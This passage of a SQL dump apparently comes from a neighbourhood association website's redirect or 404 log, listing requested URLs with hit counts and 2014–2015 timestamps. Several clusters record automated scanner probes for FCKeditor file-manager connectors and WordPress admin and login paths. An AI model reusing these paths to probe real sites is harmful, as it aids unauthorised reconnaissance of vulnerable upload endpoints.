00:00:00'),(304,'http://www.hallcrestheights.org/association/%22http://maps.google.com/maps/place?cid=5727665263910949534&q=library+mclean+va&gl=us&hl=en&cd=1&cad=src:pplink&ei=kz2OTK7CK5fUzATu7_BR%22','','','',1,0,'2014-09-01 23:48:14','0000-00-00 00:00:00'),(305,'http://www.hallcrestheights.org/community/%22http://maps.google.com/maps/place?cid=7422004494754812582&q=golf+course+mclean+va&gl=us&hl=en&cd=4&cad=src:pplink&ei=lTyOTJvVKaDeygT1pqTdDw%22','','','',1,0,'2014-09-01 23:48:15','0000-00-00 00:00:00'),(306,'http://www.hallcrestheights.org/association/%22http://www.wmata.com/%22','','','',1,0,'2014-09-01 23:48:16','0000-00-00 00:00:00'),(307,'http://www.hallcrestheights.org/community/%22http://maps.google.com/maps/place?cid=10679457874143768481&q=golf+course+mclean+va&gl=us&hl=en&cd=1&cad=src:pplink&ei=lTyOTJvVKaDeygT1pqTdDw%22','','','',1,0,'2014-09-01 23:48:18','0000-00-00 00:00:00'),(308,'http://www.hallcrestheights.org/community/%22http://www.dominionhospital.com/%22','','','',1,0,'2014-09-01 23:48:19','0000-00-00 00:00:00'),(309,'http://www.hallcrestheights.org/community/%22http://maps.google.com/maps?q=Lewinsville+Presbyterian+Church+1724+Chain+Bridge+Rd.,+McLean,+VA&hl=en&ll=38.92982,-77.197194&spn=0.009882,0.01929&sll=38.929849,-77.196959&sspn=0.009882,0.01929&hq=Lewinsville+Pr','','','',1,0,'2014-09-02 01:17:49','0000-00-00 00:00:00'),(310,'http://www.hallcrestheights.org/community/%22http://www.fairsandfestivals.net/states/va%22','','','',1,0,'2014-09-02 01:17:51','0000-00-00 00:00:00'),(311,'http://www.hallcrestheights.org/association/%22http://maps.google.com/maps/place?cid=10737563807815193592&q=worship+mclean+va&gl=us&hl=en&cd=6&cad=src:pplink&ei=0jqOTJv0G5uuzASfm5GIAQ%22','','','',1,0,'2014-09-02 01:17:52','0000-00-00 00:00:00'),(312,'http://www.hallcrestheights.org/editor/editor/filemanager/browser/default/connectors/test.html','','','',1,0,'2014-09-07 17:33:20','0000-00-00 00:00:00'),(313,'http://www.hallcrestheights.org/webeditor/editor/filemanager/browser/default/connectors/test.html','','','',1,0,'2014-09-07 17:33:22','0000-00-00 00:00:00'),(314,'http://www.hallcrestheights.org/webmanage/fckeditor/editor/filemanager/connectors/test.html','','','',1,0,'2014-09-07 17:33:22','0000-00-00 00:00:00'),(315,'http://hallcrestheights.org/FCK/editor/dialog/fck_about.html','','http://hallcrestheights.org/FCK/editor/dialog/fck_about.html','',1,0,'2014-09-09 19:06:09','0000-00-00 00:00:00'),(316,'http://hallcrestheights.org/manage/FCKeditor/editor/dialog/fck_about.html','','http://hallcrestheights.org/manage/FCKeditor/editor/dialog/fck_about.html','',1,0,'2014-09-09 19:06:12','0000-00-00 00:00:00'),(317,'http://hallcrestheights.org/editor/editor/dialog/fck_about.html','','http://hallcrestheights.org/editor/editor/dialog/fck_about.html','',1,0,'2014-09-09 19:06:14','0000-00-00 00:00:00'),(318,'http://hallcrestheights.org/editor/FCKeditor/editor/dialog/fck_about.html','','http://hallcrestheights.org/editor/FCKeditor/editor/dialog/fck_about.html','',1,0,'2014-09-09 19:06:15','0000-00-00 00:00:00'),(319,'http://www.hallcrestheights.org/notify-NotifyUser_NONE_coach?aHR0cDovL3d3dy5oYWxsY3Jlc3RoZWlnaHRzLm9yZy9hc3NvY2lhdGlvbi9uZXdzbGV0dGVycy5odG1s','','','',1,0,'2014-09-16 05:05:40','0000-00-00 00:00:00'),(320,'http://hallcrestheights.org/undefined','','http://hallcrestheights.org/','',1,0,'2014-09-17 03:06:12','0000-00-00 00:00:00'),(321,'http://www.hallcrestheights.org/webmanage/fckeditor/editor/fckeditor.html','','','',1,0,'2014-09-30 22:49:35','0000-00-00 00:00:00'),(322,'http://www.hallcrestheights.org/WebAdmin/FCKeditor/editor/fckeditor.html','','','',1,0,'2014-09-30 22:49:36','0000-00-00 00:00:00'),(323,'http://www.hallcrestheights.org/system/fckeditor/editor/fckeditor.html','','','',1,0,'2014-09-30 22:49:36','0000-00-00 00:00:00'),(324,'http://www.hallcrestheights.org/public/js/fckeditor/fckeditor.html','','','',1,0,'2014-09-30 22:49:38','0000-00-00 00:00:00'),(325,'http://www.hallcrestheights.org/path/fckeditor/editor/fckeditor.html','','','',1,0,'2014-09-30 22:49:38','0000-00-00 00:00:00'),(326,'http://www.hallcrestheights.org/oa/fckeditor/editor/fckeditor.html','','','',1,0,'2014-09-30 22:49:39','0000-00-00 00:00:00'),(327,'http://www.hallcrestheights.org/mods/ckeditor/fckeditor.html','','','',1,0,'2014-09-30 22:49:39','0000-00-00 00:00:00'),(328,'http://www.hallcrestheights.org/manage/fckeditor/editor/fckeditor.html','','','',1,0,'2014-09-30 22:49:40','0000-00-00 00:00:00'),(329,'http://www.hallcrestheights.org/manage/editor/fckeditor.html','','','',1,0,'2014-09-30 22:49:40','0000-00-00 00:00:00'),(330,'http://www.hallcrestheights.org/login/editors/fckeditor/editor/fckeditor.html','','','',1,0,'2014-09-30 22:49:41','0000-00-00 00:00:00'),(331,'http://www.hallcrestheights.org/js/fckeditor/editor/fckeditor.html','','','',1,0,'2014-09-30 22:49:42','0000-00-00 00:00:00'),(332,'http://www.hallcrestheights.org/includes/editors/fckeditor/editor/fckeditor.html','','','',1,0,'2014-09-30 22:49:43','0000-00-00 00:00:00'),(333,'http://www.hallcrestheights.org/fckeditor1/editor/fckeditor.html','','','',1,0,'2014-09-30 22:49:43','0000-00-00 00:00:00'),(334,'http://www.hallcrestheights.org/fckeditor_ap/editor/fckeditor.html','','','',1,0,'2014-09-30 22:49:44','0000-00-00 00:00:00'),(335,'http://www.hallcrestheights.org/fck/editor/fckeditor.html','','','',1,0,'2014-09-30 22:49:45','0000-00-00 00:00:00'),(336,'http://www.hallcrestheights.org/editors/fckeditor/editor/fckeditor.html','','','',1,0,'2014-09-30 22:49:45','0000-00-00 00:00:00'),(337,'http://www.hallcrestheights.org/editor/fckeditor.html','','','',1,0,'2014-09-30 22:49:46','0000-00-00 00:00:00'),(338,'http://www.hallcrestheights.org/edit/editor/fckeditor.html','','','',1,0,'2014-09-30 22:49:47','0000-00-00 00:00:00'),(339,'http://www.hallcrestheights.org/cms/fckeditor/editor/fckeditor.html','','','',1,0,'2014-09-30 22:49:47','0000-00-00 00:00:00'),(340,'http://www.hallcrestheights.org/bbadmin/editors/fckeditor/editor/fckeditor.html','','','',1,0,'2014-09-30 22:49:48','0000-00-00 00:00:00'),(341,'http://www.hallcrestheights.org/admin/fckeditor1/editor/fckeditor.html','','','',1,0,'2014-09-30 22:49:50','0000-00-00 00:00:00'),(342,'http://www.hallcrestheights.org/admin/fckeditor_ap/editor/fckeditor.html','','','',1,0,'2014-09-30 22:49:51','0000-00-00 00:00:00'),(343,'http://www.hallcrestheights.org/admin/fckeditor/editor/fckeditor.html','','','',1,0,'2014-09-30 22:49:51','0000-00-00 00:00:00'),(344,'http://www.hallcrestheights.org/admin/fck/editor/fckeditor.html','','','',1,0,'2014-09-30 22:49:52','0000-00-00 00:00:00'),(345,'http://www.hallcrestheights.org/admin/editors/fckeditor/editor/fckeditor.html','','','',1,0,'2014-09-30 22:49:52','0000-00-00 00:00:00'),(346,'http://www.hallcrestheights.org/admin/editor/fckeditor.html','','','',1,0,'2014-09-30 22:49:53','0000-00-00 00:00:00'),(347,'http://hallcrestheights.org/interests.html/community/real-estate-guide.html','','','',1,0,'2014-10-01 04:33:17','0000-00-00 00:00:00'),(348,'http://hallcrestheights.org/association/newsletters.html/interests.html','','','',1,0,'2014-10-10 08:00:04','0000-00-00 00:00:00'),(349,'http://hallcrestheights.org/association/newsletters.html/terms-of-service.html','','','',1,0,'2014-10-10 08:00:10','0000-00-00 00:00:00'),(350,'http://hallcrestheights.org/association/newsletters.html/community/real-estate-guide.html','','','',1,0,'2014-10-10 08:00:13','0000-00-00 00:00:00'),(351,'http://hallcrestheights.org/association/newsletters.html/association/about-us.html','','','',1,0,'2014-10-10 08:00:28','0000-00-00 00:00:00'),(352,'http://hallcrestheights.org/association/newsletters.html/community/events.html','','','',1,0,'2014-10-10 08:00:36','0000-00-00 00:00:00'),(353,'http://hallcrestheights.org/association/newsletters.html/community/neighborhood-guide.html','','','',1,0,'2014-10-10 08:00:46','0000-00-00 00:00:00'),(354,'http://hallcrestheights.org/association/newsletters.html/association/board-members.html','','','',1,0,'2014-10-10 08:00:46','0000-00-00 00:00:00'),(355,'http://hallcrestheights.org/association/newsletters.html/community/announcements.html','','','',1,0,'2014-10-10 08:00:48','0000-00-00 00:00:00'),(356,'http://hallcrestheights.org/association/newsletters.html/site-map.html','','','',1,0,'2014-10-10 08:00:50','0000-00-00 00:00:00'),(357,'http://hallcrestheights.org/association/newsletters.html/association/newsletters.html','','','',1,0,'2014-10-10 08:01:02','0000-00-00 00:00:00'),(358,'http://hallcrestheights.org/association/newsletters.html/privacy-policy.html','','','',1,0,'2014-10-10 08:01:11','0000-00-00 00:00:00'),(359,'http://www.hallcrestheights.org/includes/fckeditor/editor/','','','',1,0,'2014-10-11 20:23:06','0000-00-00 00:00:00'),(360,'http://www.hallcrestheights.org/editor/editor/','','','',1,0,'2014-10-11 20:23:06','0000-00-00 00:00:00'),(361,'http://www.hallcrestheights.org/inc/editor/','','','',1,0,'2014-10-11 20:23:06','0000-00-00 00:00:00'),(362,'http://www.hallcrestheights.org/admin/fckeditor/editor/','','','',1,0,'2014-10-11 20:23:06','0000-00-00 00:00:00'),(363,'http://www.hallcrestheights.org/js/fckeditor/editor/','','','',1,0,'2014-10-11 20:23:06','0000-00-00 00:00:00'),(364,'http://www.hallcrestheights.org/system/fckeditor/editor/','','','',1,0,'2014-10-11 20:23:06','0000-00-00 00:00:00'),(365,'http://www.hallcrestheights.org/include/fckeditor/editor/','','','',1,0,'2014-10-11 20:23:06','0000-00-00 00:00:00'),(366,'http://www.hallcrestheights.org/inc/fckeditor/editor/','','','',1,0,'2014-10-11 20:23:07','0000-00-00 00:00:00'),(367,'http://www.hallcrestheights.org/manage/fckeditor/editor/','','','',1,0,'2014-10-11 20:23:07','0000-00-00 00:00:00'),(368,'http://www.hallcrestheights.org/common/fckeditor/editor/','','','',1,0,'2014-10-11 20:23:07','0000-00-00 00:00:00'),(369,'http://www.hallcrestheights.org/scripts/fckeditor/editor/','','','',1,0,'2014-10-11 20:23:07','0000-00-00 00:00:00'),(370,'http://www.hallcrestheights.org/editor/fckeditor/editor/','','','',1,0,'2014-10-11 20:23:07','0000-00-00 00:00:00'),(371,'http://www.hallcrestheights.org/fckeditor/editor/','','','',1,0,'2014-10-11 20:23:07','0000-00-00 00:00:00'),(372,'http://hallcrestheights.org/wp-login/','','','',1,0,'2014-10-31 07:24:18','0000-00-00 00:00:00'),(373,'http://www.hallcrestheights.orghttp//www.hallcrestheights.org/board.html','','http://www.hallcrestheights.org/board.html','',1,0,'2014-11-03 23:40:32','0000-00-00 00:00:00'),(374,'http://www.hallcrestheights.orghttp//www.hallcrestheights.org/','','http://www.hallcrestheights.org/','',1,0,'2014-11-03 23:41:01','0000-00-00 00:00:00'),(375,'http://hallcrestheights.org/test/wp-admin/','','','',4,0,'2014-11-04 17:04:50','0000-00-00 00:00:00'),(376,'http://www.hallcrestheights.org/editor/dialog/fck_about.html','','http://www.hallcrestheights.org/editor/dialog/fck_about.html','',1,0,'2014-11-06 20:18:09','0000-00-00 00:00:00'),(377,'http://www.hallcrestheights.org/FCKeditor/editor/dialog/fck_about.html','','http://www.hallcrestheights.org/FCKeditor/editor/dialog/fck_about.html','',1,0,'2014-11-06 20:18:10','0000-00-00 00:00:00'),(378,'http://www.hallcrestheights.org/FCK/editor/dialog/fck_about.html','','http://www.hallcrestheights.org/FCK/editor/dialog/fck_about.html','',1,0,'2014-11-06 20:18:10','0000-00-00 00:00:00'),(379,'http://www.hallcrestheights.org/admin/FCKeditor/editor/dialog/fck_about.html','','http://www.hallcrestheights.org/admin/FCKeditor/editor/dialog/fck_about.html','',1,0,'2014-11-06 20:18:11','0000-00-00 00:00:00'),(380,'http://www.hallcrestheights.org/manage/FCKeditor/editor/dialog/fck_about.html','','http://www.hallcrestheights.org/manage/FCKeditor/editor/dialog/fck_about.html','',1,0,'2014-11-06 20:18:12','0000-00-00 00:00:00'),(381,'http://www.hallcrestheights.org/editor/editor/dialog/fck_about.html','','http://www.hallcrestheights.org/editor/editor/dialog/fck_about.html','',1,0,'2014-11-06 20:18:15','0000-00-00 00:00:00'),(382,'http://www.hallcrestheights.org/editor/FCKeditor/editor/dialog/fck_about.html','','http://www.hallcrestheights.org/editor/FCKeditor/editor/dialog/fck_about.html','',1,0,'2014-11-06 20:18:16','0000-00-00 00:00:00'),(383,'http://hallcrestheights.org/archiver','','','',1,0,'2014-11-07 20:47:23','0000-00-00 00:00:00'),(384,'http://hallcrestheights.org/wp-content','','','',1,0,'2014-11-07 20:47:25','0000-00-00 00:00:00'),(385,'http://hallcrestheights.org/readme.html','','','',2,0,'2014-11-07 20:47:26','0000-00-00 00:00:00'),(386,'http://hallcrestheights.org/interests.html/association/newsletters.html','','','',1,0,'2014-11-11 12:09:25','0000-00-00 00:00:00'),(387,'http://hallcrestheights.org/interests.html/association/board-members.html','','','',1,0,'2014-11-11 12:09:46','0000-00-00 00:00:00'),(388,'http://hallcrestheights.org/interests.html/site-map.html','','','',1,0,'2014-11-11 12:09:56','0000-00-00 00:00:00'),(389,'http://hallcrestheights.org/interests.html/interests.html','','','',1,0,'2014-11-11 12:10:03','0000-00-00 00:00:00'),(390,'http://hallcrestheights.org/interests.html/privacy-policy.html','','','',1,0,'2014-11-11 12:10:03','0000-00-00 00:00:00'),(391,'http://hallcrestheights.org/interests.html/association/about-us.html','','','',1,0,'2014-11-11 12:10:06','0000-00-00 00:00:00'),(392,'http://hallcrestheights.org/interests.html/community/announcements.html','','','',1,0,'2014-11-11 12:10:31','0000-00-00 00:00:00'),(393,'http://hallcrestheights.org/interests.html/terms-of-service.html','','','',1,0,'2014-11-11 12:22:44','0000-00-00 00:00:00'),(394,'http://hallcrestheights.org/register/','','','',1,0,'2014-11-14 05:16:52','0000-00-00 00:00:00'),(395,'http://hallcrestheights.org/interests.html/community/events.html','','','',1,0,'2014-11-15 06:23:28','0000-00-00 00:00:00'),(396,'http://hallcrestheights.org/interests.html/community/neighborhood-guide.html','','','',1,0,'2014-11-15 06:23:36','0000-00-00 00:00:00'),(397,'http://www.hallcrestheights.org/pictures.html','','','',2,0,'2014-11-16 01:20:06','0000-00-00 00:00:00'),(398,'http://www.hallcrestheights.org/links.html','','','',1,0,'2014-11-16 01:20:07','0000-00-00 00:00:00'),(399,'http://www.hallcrestheights.org/navigate.html','','','',1,0,'2014-11-16 01:20:08','0000-00-00 00:00:00'),(400,'http://www.hallcrestheights.org/realtors.html','','','',1,0,'2014-11-16 01:20:08','0000-00-00 00:00:00'),(401,'http://www.hallcrestheights.org/wp-login/','','','',1,0,'2014-11-29 23:04:50','0000-00-00 00:00:00'),(402,'http://hallcrestheights.org/user/','','','',26,0,'2014-12-04 12:35:06','0000-00-00 00:00:00'),(403,'http://www.hallcrestheights.org/account/signup/?login_provider=local','','http://www.hallcrestheights.org/account/signup/?login_provider=local','',1,0,'2014-12-16 01:24:30','0000-00-00 00:00:00'),(404,'http://www.hallcrestheights.org/terms-of-service.html/trackback/','','http://www.hallcrestheights.org/terms-of-service.html','',1,0,'2014-12-30 15:10:06','0000-00-00 00:00:00'),(405,'http://www.hallcrestheights.org/system/fckeditor/editor/filemanager/browser/default/connectors/test.html','','http://www.hallcrestheights.org/system/fckeditor/editor/filemanager/browser/default/connectors/test.html','',1,0,'2015-01-02 18:48:00','0000-00-00 00:00:00'),(406,'http://hallcrestheights.org/FCKeditor/editor/filemanager/connectors/test.html','','','',1,0,'2015-01-04 02:36:37','0000-00-00 00:00:00'),(407,'http://hallcrestheights.org/Admin/fCKeditor/editor/filemanager/connectors/test.html','','','',1,0,'2015-01-04 02:36:37','0000-00-00 00:00:00'),(408,'http://hallcrestheights.org/Editor/editor/filemanager/connectors/test.html','','','',1,0,'2015-01-04 02:36:37','0000-00-00 00:00:00'),(409,'http://www.hallcrestheights.org//community/neighborhood-guide.html/community/neighborhood-guide.html','','','',1,0,'2015-01-07 23:43:25','0000-00-00 00:00:00'),(410,'http://www.hallcrestheights.org//community/neighborhood-guide.html/community/announcements.html','','','',1,0,'2015-01-07 23:43:27','0000-00-00 00:00:00'),(411,'http://www.hallcrestheights.org//community/neighborhood-guide.html/community/events.html','','','',1,0,'2015-01-07 23:43:28','0000-00-00 00:00:00'),(412,'http://www.hallcrestheights.org//community/neighborhood-guide.html/community/real-estate-guide.html','','','',1,0,'2015-01-07 23:43:29','0000-00-00 00:00:00'),(413,'http://www.hallcrestheights.org//community/neighborhood-guide.html/association/about-us.html','','','',1,0,'2015-01-07 23:43:31','0000-00-00 00:00:00'),(414,'http://www.hallcrestheights.org//community/neighborhood-guide.html/association/board-members.html','','','',1,0,'2015-01-07 23:43:32','0000-00-00 00:00:00'),(415,'http://www.hallcrestheights.org//community/neighborhood-guide.html/association/newsletters.html','','','',1,0,'2015-01-07 23:43:34','0000-00-00 00:00:00'),(416,'http://www.hallcrestheights.org//community/neighborhood-guide.html/interests.html','','','',1,0,'2015-01-07 23:43:35','0000-00-00 00:00:00'),(417,'http://www.hallcrestheights.org//community/neighborhood-guide.html/announcements.html','','','',1,0,'2015-01-07 23:43:37','0000-00-00 00:00:00'),(418,'http://www.hallcrestheights.org//community/neighborhood-guide.html/site-map.html','','','',1,0,'2015-01-07 23:43:38','0000-00-00 00:00:00'),(419,'http://www.hallcrestheights.org//community/neighborhood-guide.html/terms-of-service.html','','','',1,0,'2015-01-07 23:43:40','0000-00-00 00:00:00'),(420,'http://www.hallcrestheights.org//community/neighborhood-guide.html/privacy-policy.html','','','',1,0,'2015-01-07 23:43:42','0000-00-00 00:00:00'),(421,'http://www.hallcrestheights.org//community/announcements.html/community/neighborhood-guide.html','','','',1,0,'2015-01-07 23:43:45','0000-00-00 00:00:00'),(422,'http://www.hallcrestheights.org//community/announcements.html/community/announcements.html','','','',1,0,'2015-01-07 23:43:46','0000-00-00 00:00:00'),(423,'http://www.hallcrestheights.org//community/announcements.html/community/events.html','','','',1,0,'2015-01-07 23:43:48','0000-00-00 00:00:00'),(424,'http://www.hallcrestheights.org//community/announcements.html/community/real-estate-guide.html','','','',1,0,'2015-01-07 23:43:49','0000-00-00 00:00:00'),(425,'http://www.hallcrestheights.org//community/announcements.html/association/about-us.html','','','',1,0,'2015-01-07 23:43:51','0000-00-00 00:00:00'),(426,'http://www.hallcrestheights.org//community/announcements.html/association/board-members.html','','','',1,0,'2015-01-07 23:43:52','0000-00-00 00:00:00'),(427,'http://www.hallcrestheights.org//community/announcements.html/association/newsletters.html','','','',1,0,'2015-01-07 23:43:54','0000-00-00 00:00:00'),(428,'http://www.hallcrestheights.org//community/announcements.html/interests.html','','','',1,0,'2015-01-07 23:43:55','0000-00-00 00:00:00'),(429,'http://www.hallcrestheights.org//community/announcements.html/announcements.html','','','',1,0,'2015-01-07 23:43:57','0000-00-00 00:00:00'),(430,'http://www.hallcrestheights.org//community/announcements.html/site-map.html','','','',1,0,'2015-01-07 23:43:58','0000-00-00 00:00:00'),(431,'http://www.hallcrestheights.org//community/announcements.html/terms-of-service.html','','','',1,0,'2015-01-07 23:44:01','0000-00-00 00:00:00'),(432,'http://www.hallcrestheights.org//community/announcements.html/privacy-policy.html','','','',1,0,'2015-01-07 23:44:02','0000-00-00 00:00:00'),(433,'http://www.hallcrestheights.org//community/events.html/community/neighborhood-guide.html','','','',1,0,'2015-01-07 23:44:06','0000-00-00 00:00:00'),(434,'http://www.hallcrestheights.org//community/events.html/community/announcements.html','','','',1,0,'2015-01-07 23:44:07','0000-00-00 00:00:00'),(435,'http://www.hallcrestheights.org//community/events.html/community/events.html','','','',1,0,'2015-01-07 23:44:09','0000-00-00 00:00:00'),(436,'http://www.hallcrestheights.org//community/events.html/community/real-estate-guide.html','','','',1,0,'2015-01-07 23:44:11','0000-00-00 00:00:00'),(437,'http://www.hallcrestheights.org//community/events.html/association/about-us.html','','','',1,0,'2015-01-07 23:44:12','0000-00-00 00:00:00'),(438,'http://www.hallcrestheights.org//community/events.html/association/board-members.html','','','',1,0,'2015-01-07 23:44:14','0000-00-00 00:00:00'),(439,'http://www.hallcrestheights.org//community/events.html/association/newsletters.html','','','',1,0,'2015-01-07 23:44:15','0000-00-00 00:00:00'),(440,'http://www.hallcrestheights.org//community/events.html/interests.html','','','',1,0,'2015-01-07 23:44:17','0000-00-00 00:00:00'),(441,'http://www.hallcrestheights.org//community/events.html/announcements.html','','','',1,0,'2015-01-07 23:44:20','0000-00-00 00:00:00'),(442,'http://www.hallcrestheights.org//community/events.html/site-map.html','','','',1,0,'2015-01-07 23:44:21','0000-00-00 00:00:00'),(443,'http://www.hallcrestheights.org//community/events.html/terms-of-service.html','','','',1,0,'2015-01-07 23:44:23','0000-00-00 00:00:00'),(444,'http://www.hallcrestheights.org//community/events.html/privacy-policy.html','','','',1,0,'2015-01-07 23:44:24','0000-00-00 00:00:00'),(445,'http://www.hallcrestheights.org//community/real-estate-guide.html/community/neighborhood-guide.html','','','',1,0,'2015-01-07 23:44:27','0000-00-00 00:00:00'),(446,'http://www.hallcrestheights.org//community/real-estate-guide.html/community/announcements.html','','','',1,0,'2015-01-07 23:44:30','0000-00-00 00:00:00'),(447,'http://www.hallcrestheights.org//community/real-estate-guide.html/community/events.html','','','',1,0,'2015-01-07 23:44:31','0000-00-00 00:00:00'),(448,'http://www.hallcrestheights.org//community/real-estate-guide.html/community/real-estate-guide.html','','','',1,0,'2015-01-07 23:44:33','0000-00-00 00:00:00'),(449,'http://www.hallcrestheights.org//community/real-estate-guide.html/association/about-us.html','','','',1,0,'2015-01-07 23:44:34','0000-00-00 00:00:00'),(450,'http://www.hallcrestheights.org//community/real-estate-guide.html/association/board-members.html','','','',1,0,'2015-01-07 23:44:36','0000-00-00 00:00:00'),(451,'http://www.hallcrestheights.org//community/real-estate-guide.html/association/newsletters.html','','','',1,0,'2015-01-07 23:44:37','0000-00-00 00:00:00'),(452,'http://www.hallcrestheights.org//community/real-estate-guide.html/interests.html','','','',1,0,'2015-01-07 23:44:39','0000-00-00 00:00:00'),(453,'http://www.hallcrestheights.org//community/real-estate-guide.html/site-map.html','','','',1,0,'2015-01-07 23:44:41','0000-00-00 00:00:00'),(454,'http://www.hallcrestheights.org//community/real-estate-guide.html/terms-of-service.html','','','',1,0,'2015-01-07 23:44:43','0000-00-00 00:00:00'),(455,'http://www.hallcrestheights.org//community/real-estate-guide.html/privacy-policy.html','','','',1,0,'2015-01-07 23:44:44','0000-00-00 00:00:00'),(456,'http://www.hallcrestheights.org//association/about-us.html/community/neighborhood-guide.html','','','',1,0,'2015-01-07 23:44:47','0000-00-00 00:00:00'),(457,'http://www.hallcrestheights.org//association/about-us.html/community/announcements.html','','','',1,0,'2015-01-07 23:44:49','0000-00-00 00:00:00'),(458,'http://www.hallcrestheights.org//association/about-us.html/community/events.html','','','',1,0,'2015-01-07 23:44:50','0000-00-00 00:00:00'),(459,'http://www.hallcrestheights.org//association/about-us.html/community/real-estate-guide.html','','','',1,0,'2015-01-07 23:44:51','0000-00-00 00:00:00'),(460,'http://www.hallcrestheights.org//association/about-us.html/association/about-us.html','','','',1,0,'2015-01-07 23:44:52','0000-00-00 00:00:00'),(461,'http://www.hallcrestheights.org//association/about-us.html/association/board-members.html','','','',1,0,'2015-01-07 23:44:54','0000-00-00 00:00:00'),(462,'http://www.hallcrestheights.org//association/about-us.html/association/newsletters.html','','','',1,0,'2015-01-07 23:44:56','0000-00-00 00:00:00'),(463,'http://www.hallcrestheights.org//association/about-us.html/interests.html','','','',1,0,'2015-01-07 23:44:57','0000-00-00 00:00:00'),(464,'http://www.hallcrestheights.org//association/about-us.html/site-map.html','','','',1,0,'2015-01-07 23:44:59','0000-00-00 00:00:00'),(465,'http://www.hallcrestheights.org//association/about-us.html/terms-of-service.html','','','',1,0,'2015-01-07 23:45:00','0000-00-00 00:00:00'),(466,'http://www.hallcrestheights.org//association/about-us.html/privacy-policy.html','','','',1,0,'2015-01-07 23:45:02','0000-00-00 00:00:00'),(467,'http://www.hallcrestheights.org//association/board-members.html/community/neighborhood-guide.html','','','',1,0,'2015-01-07 23:45:06','0000-00-00 00:00:00'),(468,'http://www.hallcrestheights.org//association/board-members.html/community/announcements.html','','','',1,0,'2015-01-07 23:45:07','0000-00-00 00:00:00'),(469,'http://www.hallcrestheights.org//association/board-members.html/community/events.html','','','',1,0,'2015-01-07 23:45:09','0000-00-00 00:00:00'),(470,'http://www.hallcrestheights.org//association/board-members.html/community/real-estate-guide.html','','','',1,0,'2015-01-07 23:45:10','0000-00-00 00:00:00'),(471,'http://www.hallcrestheights.org//association/board-members.html/association/about-us.html','','','',1,0,'2015-01-07 23:45:12','0000-00-00 00:00:00'),(472,'http://www.hallcrestheights.org//association/board-members.html/association/board-members.html','','','',1,0,'2015-01-07 23:45:13','0000-00-00 00:00:00'),(473,'http://www.hallcrestheights.org//association/board-members.html/association/newsletters.html','','','',1,0,'2015-01-07 23:45:14','0000-00-00 00:00:00'),(474,'http://www.hallcrestheights.org//association/board-members.html/interests.html','','','',1,0,'2015-01-07 23:45:16','0000-00-00 00:00:00'),(475,'http://www.hallcrestheights.org//association/board-members.html/site-map.html','','','',1,0,'2015-01-07 23:45:17','0000-00-00 00:00:00'),(476,'http://www.hallcrestheights.org//association/board-members.html/terms-of-service.html','','','',1,0,'2015-01-07 23:45:18','0000-00-00 00:00:00'),(477,'http://www.hallcrestheights.org//association/board-members.html/privacy-policy.html','','','',1,0,'2015-01-07 23:45:19','0000-00-00 00:00:00'),(478,'http://www.hallcrestheights.org//association/newsletters.html/community/neighborhood-guide.html','','','',1,0,'2015-01-07 23:45:22','0000-00-00 00:00:00'),(479,'http://www.hallcrestheights.org//association/newsletters.html/community/announcements.html','','','',1,0,'2015-01-07 23:45:23','0000-00-00 00:00:00'),(480,'http://www.hallcrestheights.org//association/newsletters.html/community/events.html','','','',1,0,'2015-01-07 23:45:25','0000-00-00 00:00:00'),(481,'http://www.hallcrestheights.org//association/newsletters.html/community/real-estate-guide.html','','','',1,0,'2015-01-07 23:45:26','0000-00-00 00:00:00'),(482,'http://www.hallcrestheights.org//association/newsletters.html/association/about-us.html','','','',1,0,'2015-01-07 23:45:27','0000-00-00 00:00:00'),(483,'http://www.hallcrestheights.org//association/newsletters.html/association/board-members.html','','','',1,0,'2015-01-07 23:45:29','0000-00-00 00:00:00'),(484,'http://www.hallcrestheights.org//association/newsletters.html/association/newsletters.html','','','',1,0,'2015-01-07 23:45:30','0000-00-00 00:00:00'),(485,'http://www.hallcrestheights.org//association/newsletters.html/interests.html','','','',1,0,'2015-01-07 23:45:31','0000-00-00 00:00:00'),(486,'http://www.hallcrestheights.org//association/newsletters.html/site-map.html','','','',1,0,'2015-01-07 23:45:33','0000-00-00 00:00:00'),(487,'http://www.hallcrestheights.org//association/newsletters.html/terms-of-service.html','','','',1,0,'2015-01-07 23:45:34','0000-00-00 00:00:00'),(488,'http://www.hallcrestheights.org//association/newsletters.html/privacy-policy.html','','','',1,0,'2015-01-07 23:45:35','0000-00-00 00:00:00'),(489,'http://www.hallcrestheights.org//interests.html/community/neighborhood-guide.html','','','',1,0,'2015-01-07 23:45:38','0000-00-00 00:00:00'),(490,'http://www.hallcrestheights.org//interests.html/community/announcements.html','','','',1,0,'2015-01-07 23:45:39','0000-00-00 00:00:00'),(491,'http://www.hallcrestheights.org//interests.html/community/events.html','','','',1,0,'2015-01-07 23:45:40','0000-00-00 00:00:00'),(492,'http://www.hallcrestheights.org//interests.html/community/real-estate-guide.html','','','',1,0,'2015-01-07 23:45:42','0000-00-00 00:00:00'),(493,'http://www.hallcrestheights.org//interests.html/association/about-us.html','','','',1,0,'2015-01-07 23:45:43','0000-00-00 00:00:00'),(494,'http://www.hallcrestheights.org//interests.html/association/board-members.html','','','',1,0,'2015-01-07 23:45:45','0000-00-00 00:00:00'),(495,'http://www.hallcrestheights.org//interests.html/association/newsletters.html','','','',1,0,'2015-01-07 23:45:46','0000-00-00 00:00:00'),(496,'http://www.hallcrestheights.org//interests.html/interests.html','','','',1,0,'2015-01-07 23:45:48','0000-00-00 00:00:00'),(497,'http://www.hallcrestheights.org//interests.html/site-map.html','','','',1,0,'2015-01-07 23:45:55','0000-00-00 00:00:00'),(498,'http://www.hallcrestheights.org//interests.html/terms-of-service.html','','','',1,0,'2015-01-07 23:45:56','0000-00-00 00:00:00'),(499,'http://www.hallcrestheights.org//interests.html/privacy-policy.html','','','',1,0,'2015-01-07 23:45:57','0000-00-00 00:00:00'),(500,'http://www.hallcrestheights.org//announcements.html/community/neighborhood-guide.html','','','',1,0,'2015-01-07 23:46:00','0000-00-00 00:00:00'),(501,'http://www.hallcrestheights.org//announcements.html/community/announcements.html','','','',1,0,'2015-01-07 23:46:01','0000-00-00 00:00:00'),(502,'http://www.hallcrestheights.org//announcements.html/community/events.html','','','',1,0,'2015-01-07 23:46:03','0000-00-00 00:00:00'),(503,'http://www.hallcrestheights.org//announcements.html/community/real-estate-guide.html','','','',1,0,'2015-01-07 23:46:04','0000-00-00 00:00:00'),(504,'http://www.hallcrestheights.org//announcements.html/association/about-us.html','','','',1,0,'2015-01-07 23:46:05','0000-00-00 00:00:00'),(505,'http://www.hallcrestheights.org//announcements.html/association/board-members.html','','','',1,0,'2015-01-07 23:46:07','0000-00-00 00:00:00'),(506,'http://www.hallcrestheights.org//announcements.html/association/newsletters.html','','','',1,0,'2015-01-07 